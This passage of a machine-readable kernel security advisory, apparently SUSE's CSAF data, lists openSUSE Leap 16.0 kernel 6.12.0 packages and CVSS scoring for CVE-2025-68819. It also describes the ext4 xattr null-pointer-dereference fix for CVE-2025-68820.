"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
